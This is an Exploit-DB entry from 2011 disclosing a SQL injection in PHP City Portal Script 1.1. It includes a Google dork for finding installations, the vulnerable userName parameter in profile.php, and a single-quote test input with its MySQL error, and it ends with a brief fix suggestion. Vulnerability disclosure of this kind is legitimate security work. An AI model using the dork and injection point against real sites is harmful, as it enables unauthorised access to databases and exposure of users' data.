exploit-db-mirror/exploits/php/webapps/18210.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

28 lines
No EOL
998 B
Text

############################################################################
# Exploit Title: *Php City Portal Script Software SQL Injection*
# Google Dork: *Powered by PHPCityPortal.com*
# Date: *Decembar/07/2011*
# Author: *Don (BalcanCrew & BalcanHack)*
# Software Link: *http://phpcityportal.com*
# Version: *1.1*
# Tested on: *Apache (Unix)*
############################################################################
# An attacker may execute arbitrary SQL statements on the vulnerable system.
# This may compromise the integrity of your database and/or expose
sensitive information.
############################################################################
*Attack details:*
URL encoded GET input userName was set to *1'*
Error message found: supplied argument is not a valid MySQL result
Vulnerability:
*http://localhost/phpcityportal/profile.php?userName= (SQL)*
*How to fix this vulnerability:*
Filter metacharacters from user input.
*NOTE!*
*You have to be logged in!*
~Don 2011